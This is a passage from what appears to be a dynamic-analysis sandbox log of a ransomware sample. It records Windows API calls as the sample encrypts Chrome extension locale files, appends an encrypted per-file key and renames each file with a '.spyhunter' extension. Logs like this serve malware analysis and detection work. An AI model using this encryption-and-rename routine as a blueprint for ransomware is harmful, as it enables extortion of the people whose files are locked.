pbData=0x31f188*, pdwDataLen=0x57f550*=0x30) returned 1 [0136.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0136.268] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.268] GetProcessHeap () returned 0x2c0000 [0136.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.268] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f514*=0xcf, lpOverlapped=0x0) returned 1 [0136.269] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.269] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x57f514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f514*=0xcf, lpOverlapped=0x0) returned 1 [0136.269] GetProcessHeap () returned 0x2c0000 [0136.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.269] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.269] WriteFile (in: hFile=0xec, lpBuffer=0x57f554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f514, lpOverlapped=0x0 | out: lpBuffer=0x57f554*, lpNumberOfBytesWritten=0x57f514*=0x4, lpOverlapped=0x0) returned 1 [0136.270] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f514, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f514*=0x30, lpOverlapped=0x0) returned 1 [0136.270] CloseHandle (hObject=0xec) returned 1 [0136.270] GetProcessHeap () returned 0x2c0000 [0136.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.270] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.spyhunter") returned 165 [0136.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.spyhunter")) returned 1 [0136.271] GetProcessHeap () returned 0x2c0000 [0136.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.271] GetProcessHeap () returned 0x2c0000 [0136.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.271] GetProcessHeap () returned 0x2c0000 [0136.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc44d8 | out: hHeap=0x2c0000) returned 1 [0136.272] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f550 | out: pbBuffer=0x57f550) returned 1 [0136.272] GetProcessHeap () returned 0x2c0000 [0136.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.272] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f548*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f548*=0x30) returned 1 [0136.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0136.273] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.273] GetProcessHeap () returned 0x2c0000 [0136.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.273] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f50c*=0xe0, lpOverlapped=0x0) returned 1 [0136.381] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.381] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x57f50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f50c*=0xe0, lpOverlapped=0x0) returned 1 [0136.381] GetProcessHeap () returned 0x2c0000 [0136.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.382] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.382] WriteFile (in: hFile=0xec, lpBuffer=0x57f54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f50c, lpOverlapped=0x0 | out: lpBuffer=0x57f54c*, lpNumberOfBytesWritten=0x57f50c*=0x4, lpOverlapped=0x0) returned 1 [0136.382] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f50c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f50c*=0x30, lpOverlapped=0x0) returned 1 [0136.382] CloseHandle (hObject=0xec) returned 1 [0136.382] GetProcessHeap () returned 0x2c0000 [0136.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.382] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.spyhunter") returned 165 [0136.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.spyhunter")) returned 1 [0136.383] GetProcessHeap () returned 0x2c0000 [0136.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.383] GetProcessHeap () returned 0x2c0000 [0136.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.383] GetProcessHeap () returned 0x2c0000 [0136.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc41c8 | out: hHeap=0x2c0000) returned 1 [0136.384] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f548 | out: pbBuffer=0x57f548) returned 1 [0136.385] GetProcessHeap () returned 0x2c0000 [0136.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.385] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f540*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f540*=0x30) returned 1 [0136.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned 155 [0136.385] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.385] GetProcessHeap () returned 0x2c0000 [0136.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.385] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f504*=0xd8, lpOverlapped=0x0) returned 1 [0136.386] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.387] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x57f504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f504*=0xd8, lpOverlapped=0x0) returned 1 [0136.387] GetProcessHeap () returned 0x2c0000 [0136.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.387] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.387] WriteFile (in: hFile=0xec, lpBuffer=0x57f544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f504, lpOverlapped=0x0 | out: lpBuffer=0x57f544*, lpNumberOfBytesWritten=0x57f504*=0x4, lpOverlapped=0x0) returned 1 [0136.387] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f504, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f504*=0x30, lpOverlapped=0x0) returned 1 [0136.387] CloseHandle (hObject=0xec) returned 1 [0136.387] GetProcessHeap () returned 0x2c0000 [0136.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.387] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.spyhunter") returned 165 [0136.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.spyhunter")) returned 1 [0136.389] GetProcessHeap () returned 0x2c0000 [0136.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.389] GetProcessHeap () returned 0x2c0000 [0136.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.389] GetProcessHeap () returned 0x2c0000 [0136.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d870 | out: hHeap=0x2c0000) returned 1 [0136.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f540 | out: pbBuffer=0x57f540) returned 1 [0136.390] GetProcessHeap () returned 0x2c0000 [0136.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f538*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f538*=0x30) returned 1 [0136.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.391] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0136.391] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.391] GetProcessHeap () returned 0x2c0000 [0136.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.391] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f4fc*=0xde, lpOverlapped=0x0) returned 1 [0136.393] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.393] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x57f4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f4fc*=0xde, lpOverlapped=0x0) returned 1 [0136.393] GetProcessHeap () returned 0x2c0000 [0136.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.393] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.393] WriteFile (in: hFile=0xec, lpBuffer=0x57f53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4fc, lpOverlapped=0x0 | out: lpBuffer=0x57f53c*, lpNumberOfBytesWritten=0x57f4fc*=0x4, lpOverlapped=0x0) returned 1 [0136.394] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4fc*=0x30, lpOverlapped=0x0) returned 1 [0136.394] CloseHandle (hObject=0xec) returned 1 [0136.394] GetProcessHeap () returned 0x2c0000 [0136.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.394] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.spyhunter") returned 165 [0136.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.spyhunter")) returned 1 [0136.394] GetProcessHeap () returned 0x2c0000 [0136.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.395] GetProcessHeap () returned 0x2c0000 [0136.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.395] GetProcessHeap () returned 0x2c0000 [0136.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d560 | out: hHeap=0x2c0000) returned 1 [0136.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f538 | out: pbBuffer=0x57f538) returned 1 [0136.396] GetProcessHeap () returned 0x2c0000 [0136.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f530*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f530*=0x30) returned 1 [0136.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.396] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0136.396] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.396] GetProcessHeap () returned 0x2c0000 [0136.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.397] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f4f4*=0xcf, lpOverlapped=0x0) returned 1 [0136.398] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.398] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x57f4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f4f4*=0xcf, lpOverlapped=0x0) returned 1 [0136.398] GetProcessHeap () returned 0x2c0000 [0136.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.398] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.398] WriteFile (in: hFile=0xec, lpBuffer=0x57f534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4f4, lpOverlapped=0x0 | out: lpBuffer=0x57f534*, lpNumberOfBytesWritten=0x57f4f4*=0x4, lpOverlapped=0x0) returned 1 [0136.398] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4f4*=0x30, lpOverlapped=0x0) returned 1 [0136.398] CloseHandle (hObject=0xec) returned 1 [0136.398] GetProcessHeap () returned 0x2c0000 [0136.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.398] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.spyhunter") returned 165 [0136.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.spyhunter")) returned 1 [0136.399] GetProcessHeap () returned 0x2c0000 [0136.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.399] GetProcessHeap () returned 0x2c0000 [0136.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.399] GetProcessHeap () returned 0x2c0000 [0136.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d250 | out: hHeap=0x2c0000) returned 1 [0136.611] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f530 | out: pbBuffer=0x57f530) returned 1 [0136.611] GetProcessHeap () returned 0x2c0000 [0136.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.611] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f528*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f528*=0x30) returned 1 [0136.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json") returned 155 [0136.612] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.612] GetProcessHeap () returned 0x2c0000 [0136.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.612] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f4ec*=0xe0, lpOverlapped=0x0) returned 1 [0136.613] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.613] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x57f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f4ec*=0xe0, lpOverlapped=0x0) returned 1 [0136.613] GetProcessHeap () returned 0x2c0000 [0136.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 